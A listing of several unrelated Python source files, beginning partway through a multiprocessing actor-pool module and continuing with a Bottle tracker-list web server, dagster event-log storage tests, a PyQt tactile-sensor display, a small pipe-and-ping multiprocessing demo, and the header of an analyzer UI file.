entry = self._stub_ids_in_use.pop(stub_id, None)
if entry is None:
return
try:
_BoundMethod('_disadopt', entry.conn)()
except Exception:
self._release(entry)
raise
heapq.heappush(self._pool, entry)
self._cleanup()
def _spawn(self):
conn, conn_actor = self._context.Pipe()
try:
name = 'pactor-%02d' % self._COUNTER()
entry = self._Entry(
process=self._context.Process(
name=name,
target=_ProcessActor(name, conn_actor),
),
conn=conn,
negative_num_uses=0,
)
entry.process.start()
# Block until process actor has received conn_actor; then we
# may close conn_actor.
_BoundMethod('_adopt', conn)(None)
except Exception:
conn.close()
raise
finally:
conn_actor.close()
return entry
def _release(self, entry):
self._num_concurrent_processes -= 1
try:
_conn_send(entry.conn, None)
entry.process.join(timeout=1)
if entry.process.exitcode is None:
LOG.warning(
'process actor does not quit: pid=%d', entry.process.pid
)
entry.process.kill()
entry.process.join(timeout=1)
if entry.process.exitcode is None:
raise RuntimeError(
'process actor cannot be killed: pid=%d' %
entry.process.pid
)
if entry.process.exitcode != 0:
# Sadly SIGTERM also causes exitcode != 0.
LOG.warning(
'process actor err out: pid=%d exitcode=%d',
entry.process.pid,
entry.process.exitcode,
)
# Process can only be closed after exits.
entry.process.close()
finally:
entry.conn.close()
def _cleanup(self):
while self._pool:
if (
len(self._pool) > self._pool_size or (
self._max_uses_per_actor is not None and
-self._pool[0].negative_num_uses > self._max_uses_per_actor
)
):
self._release(heapq.heappop(self._pool))
else:
break
# Check crashed actors.
i = 0
last = len(self._pool) - 1
while i <= last:
if self._pool[i].process.exitcode is not None:
self._pool[i], self._pool[last] = \
self._pool[last], self._pool[i]
last -= 1
else:
i += 1
if last < len(self._pool) - 1:
to_release = self._pool[last:]
del self._pool[last:]
heapq.heapify(self._pool)
for entry in to_release:
try:
self._release(entry)
except Exception as exc:
LOG.error('cleanup: unable to release process: %r', exc)
def close(self, graceful=True):
entries = list(self._pool)
self._pool.clear()
if graceful:
for entry in entries:
try:
self._release(entry)
except Exception as exc:
LOG.error('close: unable to release process: %r', exc)
ASSERT.empty(self._stub_ids_in_use)
else:
entries.extend(self._stub_ids_in_use.values())
self._stub_ids_in_use.clear()
self._num_concurrent_processes -= len(entries)
for entry in entries:
entry.process.kill()
for entry in entries:
entry.process.join(timeout=1)
if entry.process.exitcode is None:
LOG.error(
'close: process actor cannot be killed: pid=%d',
entry.process.pid
)
else:
# Process can only be closed after exits.
entry.process.close()
entry.conn.close()
@dataclasses.dataclass(frozen=True)
class _Call:
method: str
args: Tuple[Any, ...]
kwargs: Dict[str, Any]
# It seems like you cannot call sendmsg with empty buffers.
_SEND_FDS_DUMMY = b'0'
class _Stub:
def __init__(self, referent_type, process, conn):
self._conn = conn
self._submit = _BoundMethod('_submit', conn)
self._apply = _BoundMethod('_apply', conn)
self.m = _Methods(referent_type, process, conn)
def send_fds(self, fds):
ASSERT.not_empty(fds)
_conn_send(self._conn, _Call('_send_fds', (len(fds), ), {}))
sock = socket.socket(fileno=self._conn.fileno())
try:
_send_fds(sock, [_SEND_FDS_DUMMY], fds)
finally:
sock.detach()
remote_fds, exc = _conn_recv(self._conn)
if exc is not None:
raise exc
ASSERT.equal(len(remote_fds), len(fds))
return remote_fds
def submit(self, func, *args, **kwargs):
return self._submit(func, args, kwargs)
def apply(self, func, *args, **kwargs):
return self._apply(func, args, kwargs)
class _Methods:
def __init__(self, referent_type, process, conn):
self._referent_type = referent_type
self._process = process
self._bound_methods = g1_collections.LoadingDict(
functools.partial(_BoundMethod, conn=conn)
)
def __getattr__(self, name):
ASSERT.none(self._process.exitcode)
attr = getattr(self._referent_type, name, None)
bound_method = self._bound_methods[ASSERT.not_startswith(name, '_')]
if attr is None or isinstance(attr, property):
# Instance attribute or property.
return bound_method()
else:
# Static/class/instance method.
return bound_method
class _BoundMethod:
def __init__(self, name, conn):
self._name = name
self._conn = conn
def __call__(self, *args, **kwargs):
_conn_send(self._conn, _Call(self._name, args, kwargs))
result, exc = _conn_recv(self._conn)
if exc is not None:
raise exc
return result
class _ProcessActor:
# TODO: Get this from g1.apps.loggers?
_LOG_FORMAT = (
'%(asctime)s %(threadName)s %(levelname)s %(name)s: %(message)s'
)
def __init__(self, name, conn):
self._name = name
self._conn = conn
self._referent = None
def __call__(self):
self._process_init()
try:
while True:
try:
call = _conn_recv(self._conn)
except (EOFError, OSError, KeyboardInterrupt) as exc:
LOG.warning('actor input closed early: %r', exc)
break
if call is None: # Normal exit.
break
self._handle(call)
del call
except BaseException:
# Actor only exits due to either self._conn is closed, or
# call is None. We treat everything else as crash, even
# BaseException like SystemExit.
LOG.exception('actor crashed')
raise
finally:
self._process_cleanup()
def _process_init(self):
threading.current_thread().name = self._name
logging.basicConfig(level=logging.INFO, format=self._LOG_FORMAT)
LOG.info('start: pid=%d', os.getpid())
def _process_cleanup(self):
LOG.info('exit: pid=%d', os.getpid())
self._conn.close()
# NOTE:
#
# * When handling exceptions, remember to strip off the stack trace
# before sending it back (although I think pickle does this for
# you?).
#
# * Because recv_bytes is blocking, you have to very, very careful
# not to block actor's caller indefinitely, waiting for actor's
# response. One particular example is pickle.dumps, which fails
# on many cases, and this is why we call ForkingPickler.dumps
# explicitly.
def _handle(self, call):
# First, check actor methods.
if call.method == '_adopt':
self._handle_adopt(call)
elif call.method == '_disadopt':
self._handle_disadopt(call)
elif call.method == '_send_fds':
self._handle_send_fds(call)
elif call.method == '_submit':
self._handle_submit(call)
# Then, check referent methods.
elif self._referent is None:
self._send_exc(AssertionError('expect referent not None'))
elif call.method == '_apply':
self._handle_apply(call)
elif call.method.startswith('_'):
self._send_exc(
AssertionError('expect public method: %s' % call.method)
)
else:
self._handle_method(call)
def _send_result(self, result):
self._conn.send_bytes(self._pickle_pair((result, None)))
def _send_exc(self, exc):
self._conn.send_bytes(
self._pickle_pair((None, exc.with_traceback(None)))
)
@staticmethod
def _pickle_pair(pair):
try:
return multiprocessing.reduction.ForkingPickler.dumps(pair)
except Exception as exc:
LOG.error('pickle error: pair=%r exc=%r', pair, exc)
return multiprocessing.reduction.ForkingPickler.dumps(
(None, exc.with_traceback(None))
)
def _handle_adopt(self, call):
self._referent = call.args[0]
self._send_result(None)
def _handle_disadopt(self, call):
del call # Unused.
self._referent = None
self._send_result(None)
def _handle_send_fds(self, call):
num_fds = call.args[0]
sock = socket.socket(fileno=self._conn.fileno())
try:
msg, fds, _, _ = _recv_fds(sock, len(_SEND_FDS_DUMMY), num_fds)
except Exception as exc:
self._send_exc(AssertionError('recv_fds error: %r' % exc))
return
finally:
sock.detach()
if msg != _SEND_FDS_DUMMY:
self._send_exc(
AssertionError(
'expect dummy message %r, not %r' % (_SEND_FDS_DUMMY, msg)
)
)
return
self._send_result(fds)
def _handle_submit(self, call):
try:
func, args, kwargs = call.args
result = func(*args, **kwargs)
except BaseException as exc:
self._send_exc(exc)
else:
self._send_result(result)
def _handle_apply(self, call):
try:
func, args, kwargs = call.args
result = func(self._referent, *args, **kwargs)
except BaseException as exc:
self._send_exc(exc)
else:
self._send_result(result)
def _handle_method(self, call):
try:
method = getattr(type(self._referent), call.method, None)
bound_method = getattr(self._referent, call.method)
if method is None or isinstance(method, property):
# Instance attribute or property.
result = bound_method
elif isinstance(method, types.MethodType):
# Class method.
result = method(*call.args, **call.kwargs)
elif inspect.isgeneratorfunction(bound_method):
# Replace a generator with a list because generator is
# not pickle-able.
result = list(bound_method(*call.args, **call.kwargs))
else:
# Static method or instance method.
result = bound_method(*call.args, **call.kwargs)
except BaseException as exc:
self._send_exc(exc)
else:
self._send_result(result)
def _conn_send(conn, obj):
conn.send_bytes(multiprocessing.reduction.ForkingPickler.dumps(obj))
def _conn_recv(conn):
return multiprocessing.reduction.ForkingPickler.loads(conn.recv_bytes())
# TODO: Use stdlib's send_fds when upgrade to Python 3.9.
def _send_fds(sock, buffers, fds, flags=0, address=None):
return sock.sendmsg(
buffers,
[(socket.SOL_SOCKET, socket.SCM_RIGHTS, array.array('i', fds))],
flags,
address,
)
# TODO: Use stdlib's recv_fds when upgrade to Python 3.9.
def _recv_fds(sock, bufsize, maxfds, flags=0):
fds = array.array('i')
msg, ancdata, flags, addr = sock.recvmsg(
bufsize,
socket.CMSG_LEN(maxfds * fds.itemsize),
flags,
)
for cmsg_level, cmsg_type, cmsg_data in ancdata:
if cmsg_level == socket.SOL_SOCKET and cmsg_type == socket.SCM_RIGHTS:
fds.frombytes(
cmsg_data[:len(cmsg_data) - (len(cmsg_data) % fds.itemsize)]
)
return msg, list(fds), flags, addr
|
server.py
|
import logging
import threading
from logging import FileHandler
from bottle import Bottle, run, static_file, request, response, HTTPError, redirect, mako_template as template
from requestlogger import WSGILogger, ApacheFormatter
import trackon
import trackerlist_project
app = Bottle()
logger = logging.getLogger('trackon_logger')
logger.setLevel(logging.INFO)
handler = logging.FileHandler('trackon.log')
logger_format = logging.Formatter('%(asctime)s - %(message)s')
handler.setFormatter(logger_format)
logger.addHandler(handler)
logger.info('Server started')
@app.route('/')
def main():
trackers_list = trackon.get_all_data_from_db()
trackers_list = trackon.process_uptime_and_downtime_time(trackers_list)
return template('tpl/main.mako', trackers=trackers_list, active='main')
@app.route('/', method='POST')
def new_trackers():
new_ts = request.forms.get('new_trackers')
check_all_trackers = threading.Thread(target=trackon.enqueue_new_trackers, args=(new_ts,))
check_all_trackers.daemon = True
check_all_trackers.start()
return main()
@app.route('/api/add', method='POST')
def new_trackers_api():
response.set_header("Access-Control-Allow-Origin", "*")
new_ts = request.forms.get('new_trackers')
check_all_trackers = threading.Thread(target=trackon.enqueue_new_trackers, args=(new_ts,))
check_all_trackers.daemon = True
check_all_trackers.start()
response.status = 204
return response
@app.route('/submitted')
def submitted():
return template('tpl/submitted.mako', data=trackon.submitted_data, size=len(trackon.submitted_trackers), active='submitted')
@app.route('/faq')
def faq():
return template('tpl/static/faq.mako', active='faq')
@app.route('/list')
def list_stable():
stable_list, size = trackon.list_uptime(95)
return template('tpl/list.mako', stable=stable_list, size=size, active='list')
@app.route('/api')
def api():
return template('tpl/static/api-docs.mako', active='api')
@app.route('/raw')
def raw():
return template('tpl/raw.mako', data=trackon.raw_data, active='raw')
@app.route('/api/<percentage:int>')
def api_percentage(percentage):
if 0 <= percentage <= 100:
add_api_headers()
formatted_list, not_needed_length = trackon.list_uptime(percentage)
return formatted_list
else:
# abort(400, "The percentage has to be between 0 an 100") Abort does not allow custom headers
raise HTTPError(status=400, body="The percentage has to be between 0 an 100", headers={"Access-Control-Allow-Origin": "*"})
@app.route('/api/stable')
def api_stable():
return api_percentage(95)
@app.route('/api/all')
def api_all():
return api_percentage(0)
@app.route('/api/live')
def api_live():
add_api_headers()
return trackon.list_live()
@app.route('/api/udp')
def api_udp():
add_api_headers()
return trackon.api_udp()
@app.route('/api/http')
def api_http():
add_api_headers()
return trackon.api_http()
@app.route('/about')
def about():
return template('tpl/static/about.mako', active='about')
@app.route('/static/<path:path>') # matches any static file
def static(path):
return static_file(path, root='static')
@app.route('/<filename>.<filetype:re:(png|svg|ico)>') # matches all favicons that should be in root
def favicon(filename, filetype):
response.content_type = 'image/x-icon'
return static_file(filename + '.' + filetype, root='static/imgs')
@app.route('/<filename>.<filetype:re:(xml|json)>') # matches browserconfig and manifest that should be in root
def app_things(filename, filetype):
return static_file(filename + '.' + filetype, root='static')
@app.hook('after_request')
def check_host_http_header():
accepted_hosts = {'localhost:8080', 'localhost', '127.0.0.1:8080', '127.0.0.1'}
if request.headers['host'] not in accepted_hosts:
redirect('http://localhost:8080/', 301)
def add_api_headers():
response.set_header("Access-Control-Allow-Origin", "*")
response.content_type = 'text/plain'
update_status = threading.Thread(target=trackon.update_outdated_trackers)
update_status.daemon = True
update_status.start()
get_trackerlist_project_list = threading.Thread(target=trackerlist_project.main)
get_trackerlist_project_list.daemon = True
get_trackerlist_project_list.start()
handlers = [FileHandler('access.log'), ]
app = WSGILogger(app, handlers, ApacheFormatter())
if __name__ == '__main__':
run(app, host='localhost', port=8080, server='waitress')
|
test_event_log.py
|
import os
import sys
import tempfile
import time
import traceback
from contextlib import contextmanager
import pytest
import sqlalchemy
from dagster.core.definitions import AssetMaterialization, ExpectationResult
from dagster.core.errors import DagsterEventLogInvalidForRun
from dagster.core.events import (
DagsterEvent,
DagsterEventType,
EngineEventData,
StepExpectationResultData,
StepMaterializationData,
)
from dagster.core.events.log import DagsterEventRecord
from dagster.core.execution.plan.objects import StepFailureData, StepSuccessData
from dagster.core.storage.event_log import (
ConsolidatedSqliteEventLogStorage,
InMemoryEventLogStorage,
SqlEventLogStorageMetadata,
SqlEventLogStorageTable,
SqliteEventLogStorage,
)
from dagster.core.storage.sql import create_engine
from dagster.seven import multiprocessing
@contextmanager
def create_in_memory_event_log_storage():
yield InMemoryEventLogStorage()
@contextmanager
def create_sqlite_run_event_logstorage():
with tempfile.TemporaryDirectory() as tmpdir_path:
yield SqliteEventLogStorage(tmpdir_path)
@contextmanager
def create_consolidated_sqlite_run_event_log_storage():
with tempfile.TemporaryDirectory() as tmpdir_path:
yield ConsolidatedSqliteEventLogStorage(tmpdir_path)
event_storage_test = pytest.mark.parametrize(
"event_storage_factory_cm_fn",
[
create_in_memory_event_log_storage,
create_sqlite_run_event_logstorage,
create_consolidated_sqlite_run_event_log_storage,
],
)
@event_storage_test
def test_init_log_storage(event_storage_factory_cm_fn):
with event_storage_factory_cm_fn() as storage:
if isinstance(storage, InMemoryEventLogStorage):
assert not storage.is_persistent
elif isinstance(storage, (SqliteEventLogStorage, ConsolidatedSqliteEventLogStorage)):
assert storage.is_persistent
else:
raise Exception("Invalid event storage type")
@event_storage_test
def test_log_storage_run_not_found(event_storage_factory_cm_fn):
with event_storage_factory_cm_fn() as storage:
assert storage.get_logs_for_run("bar") == []
@event_storage_test
def test_event_log_storage_store_events_and_wipe(event_storage_factory_cm_fn):
with event_storage_factory_cm_fn() as storage:
assert len(storage.get_logs_for_run("foo")) == 0
storage.store_event(
DagsterEventRecord(
None,
"Message2",
"debug",
"",
"foo",
time.time(),
dagster_event=DagsterEvent(
DagsterEventType.ENGINE_EVENT.value,
"nonce",
event_specific_data=EngineEventData.in_process(999),
),
)
)
assert len(storage.get_logs_for_run("foo")) == 1
assert storage.get_stats_for_run("foo")
storage.wipe()
assert len(storage.get_logs_for_run("foo")) == 0
@event_storage_test
def test_event_log_storage_store_with_multiple_runs(event_storage_factory_cm_fn):
with event_storage_factory_cm_fn() as storage:
runs = ["foo", "bar", "baz"]
for run_id in runs:
assert len(storage.get_logs_for_run(run_id)) == 0
storage.store_event(
DagsterEventRecord(
None,
"Message2",
"debug",
"",
run_id,
time.time(),
dagster_event=DagsterEvent(
DagsterEventType.STEP_SUCCESS.value,
"nonce",
event_specific_data=StepSuccessData(duration_ms=100.0),
),
)
)
for run_id in runs:
assert len(storage.get_logs_for_run(run_id)) == 1
assert storage.get_stats_for_run(run_id).steps_succeeded == 1
storage.wipe()
for run_id in runs:
assert len(storage.get_logs_for_run(run_id)) == 0
@event_storage_test
def test_event_log_storage_watch(event_storage_factory_cm_fn):
def evt(name):
return DagsterEventRecord(
None,
name,
"debug",
"",
"foo",
time.time(),
dagster_event=DagsterEvent(
DagsterEventType.ENGINE_EVENT.value,
"nonce",
event_specific_data=EngineEventData.in_process(999),
),
)
with event_storage_factory_cm_fn() as storage:
watched = []
watcher = lambda x: watched.append(x) # pylint: disable=unnecessary-lambda
assert len(storage.get_logs_for_run("foo")) == 0
storage.store_event(evt("Message1"))
assert len(storage.get_logs_for_run("foo")) == 1
assert len(watched) == 0
storage.watch("foo", 0, watcher)
storage.store_event(evt("Message2"))
storage.store_event(evt("Message3"))
storage.store_event(evt("Message4"))
attempts = 10
while len(watched) < 3 and attempts > 0:
time.sleep(0.1)
attempts -= 1
storage.end_watch("foo", watcher)
time.sleep(0.3) # this value scientifically selected from a range of attractive values
storage.store_event(evt("Message5"))
assert len(storage.get_logs_for_run("foo")) == 5
assert len(watched) == 3
storage.delete_events("foo")
assert len(storage.get_logs_for_run("foo")) == 0
assert len(watched) == 3
@event_storage_test
def test_event_log_storage_pagination(event_storage_factory_cm_fn):
def evt(name):
return DagsterEventRecord(
None,
name,
"debug",
"",
"foo",
time.time(),
dagster_event=DagsterEvent(
DagsterEventType.ENGINE_EVENT.value,
"nonce",
event_specific_data=EngineEventData.in_process(999),
),
)
with event_storage_factory_cm_fn() as storage:
storage.store_event(evt("Message_0"))
storage.store_event(evt("Message_1"))
storage.store_event(evt("Message_2"))
assert len(storage.get_logs_for_run("foo")) == 3
assert len(storage.get_logs_for_run("foo", -1)) == 3
assert len(storage.get_logs_for_run("foo", 0)) == 2
assert len(storage.get_logs_for_run("foo", 1)) == 1
assert len(storage.get_logs_for_run("foo", 2)) == 0
@event_storage_test
def test_event_log_delete(event_storage_factory_cm_fn):
with event_storage_factory_cm_fn() as storage:
assert len(storage.get_logs_for_run("foo")) == 0
storage.store_event(
DagsterEventRecord(
None,
"Message2",
"debug",
"",
"foo",
time.time(),
dagster_event=DagsterEvent(
DagsterEventType.ENGINE_EVENT.value,
"nonce",
event_specific_data=EngineEventData.in_process(999),
),
)
)
assert len(storage.get_logs_for_run("foo")) == 1
assert storage.get_stats_for_run("foo")
storage.delete_events("foo")
assert len(storage.get_logs_for_run("foo")) == 0
@event_storage_test
def test_event_log_get_stats_without_start_and_success(event_storage_factory_cm_fn):
# When an event log doesn't have a PIPELINE_START or PIPELINE_SUCCESS | PIPELINE_FAILURE event,
# we want to ensure storage.get_stats_for_run(...) doesn't throw an error.
with event_storage_factory_cm_fn() as storage:
assert len(storage.get_logs_for_run("foo")) == 0
assert storage.get_stats_for_run("foo")
def test_filesystem_event_log_storage_run_corrupted():
with tempfile.TemporaryDirectory() as tmpdir_path:
storage = SqliteEventLogStorage(tmpdir_path)
# URL begins sqlite:///
# pylint: disable=protected-access
with open(os.path.abspath(storage.conn_string_for_run_id("foo")[10:]), "w") as fd:
fd.write("some nonsense")
with pytest.raises(sqlalchemy.exc.DatabaseError):
storage.get_logs_for_run("foo")
def test_filesystem_event_log_storage_run_corrupted_bad_data():
with tempfile.TemporaryDirectory() as tmpdir_path:
storage = SqliteEventLogStorage(tmpdir_path)
SqlEventLogStorageMetadata.create_all(create_engine(storage.conn_string_for_run_id("foo")))
with storage.connect("foo") as conn:
event_insert = SqlEventLogStorageTable.insert().values( # pylint: disable=no-value-for-parameter
run_id="foo", event="{bar}", dagster_event_type=None, timestamp=None
)
conn.execute(event_insert)
with pytest.raises(DagsterEventLogInvalidForRun):
storage.get_logs_for_run("foo")
SqlEventLogStorageMetadata.create_all(create_engine(storage.conn_string_for_run_id("bar")))
with storage.connect("bar") as conn: # pylint: disable=protected-access
event_insert = SqlEventLogStorageTable.insert().values( # pylint: disable=no-value-for-parameter
run_id="bar", event="3", dagster_event_type=None, timestamp=None
)
conn.execute(event_insert)
with pytest.raises(DagsterEventLogInvalidForRun):
storage.get_logs_for_run("bar")
def cmd(exceptions, tmpdir_path):
storage = SqliteEventLogStorage(tmpdir_path)
try:
storage.get_logs_for_run_by_log_id("foo")
except Exception as exc: # pylint: disable=broad-except
exceptions.put(exc)
exc_info = sys.exc_info()
traceback.print_tb(exc_info[2])
def test_concurrent_sqlite_event_log_connections():
exceptions = multiprocessing.Queue()
with tempfile.TemporaryDirectory() as tmpdir_path:
ps = []
for _ in range(5):
ps.append(multiprocessing.Process(target=cmd, args=(exceptions, tmpdir_path)))
for p in ps:
p.start()
j = 0
for p in ps:
p.join()
j += 1
assert j == 5
excs = []
while not exceptions.empty():
excs.append(exceptions.get())
assert not excs, excs
@event_storage_test
def test_event_log_step_stats(event_storage_factory_cm_fn):
# When an event log doesn't have a PIPELINE_START or PIPELINE_SUCCESS | PIPELINE_FAILURE event,
# we want to ensure storage.get_stats_for_run(...) doesn't throw an error.
run_id = "foo"
with event_storage_factory_cm_fn() as storage:
for record in _stats_records(run_id=run_id):
storage.store_event(record)
step_stats = storage.get_step_stats_for_run(run_id)
assert len(step_stats) == 4
a_stats = [stats for stats in step_stats if stats.step_key == "A"][0]
assert a_stats.step_key == "A"
assert a_stats.status.value == "SUCCESS"
assert a_stats.end_time - a_stats.start_time == 100
b_stats = [stats for stats in step_stats if stats.step_key == "B"][0]
assert b_stats.step_key == "B"
assert b_stats.status.value == "FAILURE"
assert b_stats.end_time - b_stats.start_time == 50
c_stats = [stats for stats in step_stats if stats.step_key == "C"][0]
assert c_stats.step_key == "C"
assert c_stats.status.value == "SKIPPED"
assert c_stats.end_time - c_stats.start_time == 25
d_stats = [stats for stats in step_stats if stats.step_key == "D"][0]
assert d_stats.step_key == "D"
assert d_stats.status.value == "SUCCESS"
assert d_stats.end_time - d_stats.start_time == 150
assert len(d_stats.materializations) == 3
assert len(d_stats.expectation_results) == 2
def _stats_records(run_id):
now = time.time()
return [
_event_record(run_id, "A", now - 325, DagsterEventType.STEP_START),
_event_record(
run_id,
"A",
now - 225,
DagsterEventType.STEP_SUCCESS,
StepSuccessData(duration_ms=100000.0),
),
_event_record(run_id, "B", now - 225, DagsterEventType.STEP_START),
_event_record(
run_id,
"B",
now - 175,
DagsterEventType.STEP_FAILURE,
StepFailureData(error=None, user_failure_data=None),
),
_event_record(run_id, "C", now - 175, DagsterEventType.STEP_START),
_event_record(run_id, "C", now - 150, DagsterEventType.STEP_SKIPPED),
_event_record(run_id, "D", now - 150, DagsterEventType.STEP_START),
_event_record(
run_id,
"D",
now - 125,
DagsterEventType.STEP_MATERIALIZATION,
StepMaterializationData(AssetMaterialization(asset_key="mat_1")),
),
_event_record(
run_id,
"D",
now - 100,
DagsterEventType.STEP_EXPECTATION_RESULT,
StepExpectationResultData(ExpectationResult(success=True, label="exp 1")),
),
_event_record(
run_id,
"D",
now - 75,
DagsterEventType.STEP_MATERIALIZATION,
StepMaterializationData(AssetMaterialization(asset_key="mat_2")),
),
_event_record(
run_id,
"D",
now - 50,
DagsterEventType.STEP_EXPECTATION_RESULT,
StepExpectationResultData(ExpectationResult(success=False, label="exp 2")),
),
_event_record(
run_id,
"D",
now - 25,
DagsterEventType.STEP_MATERIALIZATION,
StepMaterializationData(AssetMaterialization(asset_key="mat_3")),
),
_event_record(
run_id, "D", now, DagsterEventType.STEP_SUCCESS, StepSuccessData(duration_ms=150000.0)
),
]
def _event_record(run_id, step_key, timestamp, event_type, event_specific_data=None):
pipeline_name = "pipeline_name"
return DagsterEventRecord(
None,
"",
"debug",
"",
run_id,
timestamp,
step_key=step_key,
pipeline_name=pipeline_name,
dagster_event=DagsterEvent(
event_type.value,
pipeline_name,
step_key=step_key,
event_specific_data=event_specific_data,
),
)
def test_secondary_index():
with create_consolidated_sqlite_run_event_log_storage() as storage:
# Only consolidated_sqlite, postgres storage support secondary indexes
assert not storage.has_secondary_index("A")
assert not storage.has_secondary_index("B")
assert "A" in storage._secondary_index_cache # pylint: disable=protected-access
assert "B" in storage._secondary_index_cache # pylint: disable=protected-access
storage.enable_secondary_index("A")
assert "A" not in storage._secondary_index_cache # pylint: disable=protected-access
assert "B" in storage._secondary_index_cache # pylint: disable=protected-access
assert storage.has_secondary_index("A")
assert "A" in storage._secondary_index_cache # pylint: disable=protected-access
assert "B" in storage._secondary_index_cache # pylint: disable=protected-access
assert not storage.has_secondary_index("B")
storage.enable_secondary_index("B")
assert "A" in storage._secondary_index_cache # pylint: disable=protected-access
assert "B" not in storage._secondary_index_cache # pylint: disable=protected-access
assert storage.has_secondary_index("A")
assert storage.has_secondary_index("B")
assert "A" in storage._secondary_index_cache # pylint: disable=protected-access
assert "B" in storage._secondary_index_cache # pylint: disable=protected-access
|
single_patch.py
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'interface.ui'
#
# Created by: PyQt5 UI code generator 5.10.1
#
# WARNING! All changes made in this file will be lost!
import os, sys, glob
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.uic import loadUiType
import numpy as np
import pyqtgraph as pg
import serial
import threading
import time
import importlib
from collections import deque
from threadhandler import ThreadHandler
Ui_MainWindow, QMainWindow = loadUiType('interface.ui')
##### The code runs two threads
# i) one for receiving data from the Microcontroller
# ii) another for updating the Interface using this data.
# Identifying the Micro Controller
ser = serial.Serial("/dev/ttyACM0",7372800)
ser.flushInput()
ser.flushOutput()
# Stores data from the Micro Controller
dataQueue = np.zeros((4,4,4))
update = 0
def getPos(pos) :
patchNum = pos//16
row = (pos%16)//4
col = (pos%16)%4
return patchNum + 4*row + 16*col
def getPos2(pos) :
patchNum = pos//16
row = (pos%16)//4
col = (pos%16)%4
return 4*patchNum + row + 16*col
# Functions to send and receive data from Micro Controller
def send(data) :
global ser
length = len(data)
for i in range(length) :
#print("writing")
ser.write((data[i]+"\r\n").encode('ascii'))
#print("wrote data :",data[i])
def receive() :
global dataQueue,ser,update
while True :
waiting = ser.inWaiting()
maxlength = 34
if waiting >= maxlength :
rawQueue = [x for x in ser.read(waiting)]
endByte = len(rawQueue)-1
#print(endByte,waiting)
while rawQueue[endByte] != 2 and endByte > 0 :
endByte = endByte-1
#print(endByte)
if endByte < maxlength-1 :
continue
if rawQueue[endByte-maxlength+1] == 1 :
for row in range(4) :
for col in range(4) :
pos = 2*(4*col+row)+endByte-maxlength+2
dataQueue[0][row][col] = 4096-(rawQueue[pos]+rawQueue[pos+1]*256)
update = 1
print("Received packet : ",dataQueue[0])
# Class for Interface
class Main(QMainWindow,Ui_MainWindow) :
def __init__(self):
super(Main,self).__init__()
self.setupUi(self)
# IntnesityData : Array to store data to be displayed on Interface
self.intensityData = []
for i in range(4) :
self.intensityData.append(np.full((4,4,3),0))
# Two variables to avoid mutliple starting and stopping of thread
self.start = 0
self.stop = 0
# initialise Interface to blue
for i in range(4) :
for j in range(4) :
for k in range(4) :
self.intensityData[i][j][k][2] = 255
# Thread which updates the plot based on received data from Micro Controller
self.thr = ThreadHandler(self.processData)
print("Intitialisation")
self.init()
# init() Contains other initialisations
def init(self) :
print("Adding ViewBoxes")
# displays are the viewboxes (one for each patch of tactile sensors)
self.display1 = self.patch1.addViewBox()
self.display2 = self.patch2.addViewBox()
self.display3 = self.patch3.addViewBox()
self.display4 = self.patch4.addViewBox()
# Image items to be displayed on the viewboxes
self.currImage1 = pg.ImageItem(self.intensityData[0])
self.display1.addItem(self.currImage1)
self.currImage2 = pg.ImageItem(self.intensityData[1])
self.display2.addItem(self.currImage2)
self.currImage3 = pg.ImageItem(self.intensityData[2])
self.display3.addItem(self.currImage3)
self.currImage4 = pg.ImageItem(self.intensityData[3])
self.display4.addItem(self.currImage4)
# Functions of Start and Stop buttons
self.startButton.clicked.connect(self.doStart)
self.stopButton.clicked.connect(self.doStop)
def doStart(self) :
# starting the thread to update the Interface
global recvThread,ser
if self.start == 0 :
ser.flushInput()
self.start = 1
self.thr.start()
recvThread.start()
def doStop(self) :
# stop the thread which updates the Interface
global recvThread
if self.stop == 0 :
print("Stopped")
self.stop = 1
self.thr.pause()
recvThread.pause()
self.thr.kill()
recvThread.kill()
# The function to update the Interface in real time. This function is ran in a thread.
def processData(self) :
global update,dataQueue
while True :
#print(update)
if update == 1 :
#print("First update")
for pos in range(64) :
patchNum = pos//16
row = (pos%16)//4
col = (pos%16)%4
if patchNum == 0 :
self.intensityData[0][row][col][0] = max(0,2*int(dataQueue[patchNum][col][row]/16)-255)
self.intensityData[0][row][col][2] = max(0,255-2*int(dataQueue[patchNum][col][row]/16))
self.intensityData[0][row][col][1] = 255-self.intensityData[0][row][col][2]-self.intensityData[0][row][col][0]
self.currImage1.setImage(self.intensityData[0],levels=(0,255))
elif patchNum == 1 :
self.intensityData[1][row][col][0] = max(0,2*int(dataQueue[patchNum][col][row]/16)-255)
self.intensityData[1][row][col][2] = max(0,255-2*int(dataQueue[patchNum][col][row]/16))
self.intensityData[1][row][col][1] = 255-self.intensityData[1][row][col][2]-self.intensityData[1][row][col][0]
self.currImage2.setImage(self.intensityData[1],levels=(0,255))
elif patchNum == 2 :
self.intensityData[2][row][col][0] = max(0,2*int(dataQueue[patchNum][col][row]/16)-255)
self.intensityData[2][row][col][2] = max(0,255-2*int(dataQueue[patchNum][col][row]/16))
self.intensityData[2][row][col][1] = 255-self.intensityData[2][row][col][2]-self.intensityData[2][row][col][0]
self.currImage3.setImage(self.intensityData[2],levels=(0,255))
elif patchNum == 3 :
self.intensityData[3][row][col][0] = max(0,2*int(dataQueue[patchNum][col][row]/16)-255)
self.intensityData[3][row][col][2] = max(0,255-2*int(dataQueue[patchNum][col][row]/16))
self.intensityData[3][row][col][1] = 255-self.intensityData[3][row][col][2]-self.intensityData[3][row][col][0]
self.currImage4.setImage(self.intensityData[3],levels=(0,255))
update = 0
#print(self.intensityData[0])
# Thread to receive data
#recvThread = threading.Thread(target = receive)
recvThread = ThreadHandler(receive)
# Parallely update the display based on received data. The class for interface( Main )
# itself runs another thread.
if __name__ == '__main__':
app = QtWidgets.QApplication(sys.argv)
main = Main()
main.show()
sys.exit(app.exec_())
|
multi_ping.py
|
from multiprocessing import Process, Pipe
import os
def create_new_process(pipe):
print("Filho process id: {}".format(os.getpid()))
command = pipe.recv()
pipe.send(os.popen(command).read())
pipe.close()
if __name__ == '__main__':
print("Pai process id: {}".format(os.getpid()))
saida_pai, saida_filho = Pipe()
filho = Process(target=create_new_process, args=(saida_filho,))
filho.start()
saida_pai.send("ping -c1 google.com")
print("output: {}".format(saida_pai.recv()))
filho.join()
print("exit...")
|
analyzer_ui.py
|
#!usr/bin/env python
#-*- coding:utf-8 _*-
"""
@version:
author:Sleepy
@time: 2017/08/08
@file: DataTable.py
@function:
@modify:
"""
import os
from PyQt5.QtWidgets import QLineEdit, QFileDialog, QCheckBox, QDateTimeEdit, QGridLayout
from StockAnalysisSystem.core.Utility.common import ProgressRate
from StockAnalysisSystem.core.Utility.ui_utility import *
